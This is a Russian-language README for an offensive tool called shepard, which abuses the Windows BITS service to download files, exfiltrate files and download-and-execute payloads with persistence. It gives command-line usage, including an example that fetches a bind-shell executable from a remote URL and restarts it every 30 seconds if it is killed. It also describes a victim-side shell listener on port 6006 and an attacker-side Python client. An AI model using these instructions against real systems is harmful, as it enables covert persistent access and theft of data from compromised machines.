
Инструмент для постоянной загрузки/выгрузки/выполнения в процессе с использованием Windows BITS.
Это инструмент персистентности, использующий фоновую интеллектуальную службу передачи Windows (BITS).
Загрузка файлов, Экфильтрация файлов, Загрузка файлов + Постоянное выполнение
Запустите shepard.exe от имени администратора со следующими аргументами командной строки:
-d <remoteLocation> <writePath> : обычная загрузка файла в локальный путь по вашему выбору
-e <remoteLocation> <localPath> : обычная выгрузка файла из локального пути по вашему выбору (отправляет только на IIS-сервер, это ограничение BITS)
-dr <remoteLocation> <writePath> [optionalFileArgs] : загрузка файла в путь по вашему выбору с попыткой поддержания персистентности. Загруженный файл будет пытаться запускаться с optionalFileArgs, и BITS будет проверять каждые 30 секунд, что файл всё ещё работает на скомпрометированной системе.
Запуск этого исполняемого файла без аргументов или с неверным количеством аргументов приведёт к чистому завершению shepard.
Сервер (жертва) написан на C#. Он прослушивает порт 6006.
Запустите shepardsbind_serv.exe без аргументов.
Клиент (атакующий) написан на Python и принимает один аргумент: IP-адрес машины жертвы.
shepardsbind_recv.py <victim's IP>
Запуск shepardsbind_recv.py без аргументов вернёт ошибку.
Единственный исполняемый файл, который должен быть на машине жертвы — это shepard.exe. Разместите загружаемый исполняемый файл bindshell в общедоступном месте. Shepard загрузит и запустит исполняемый файл bindshell, и пользователь теперь может использовать python-приёмник. Если оболочка будет обнаружена и уничтожена, она перезапустится через 30 секунд.
Пример: shepard.exe -dr http://location.com/shepardsbind_serv.exe C:\Users\Administrator\file.exe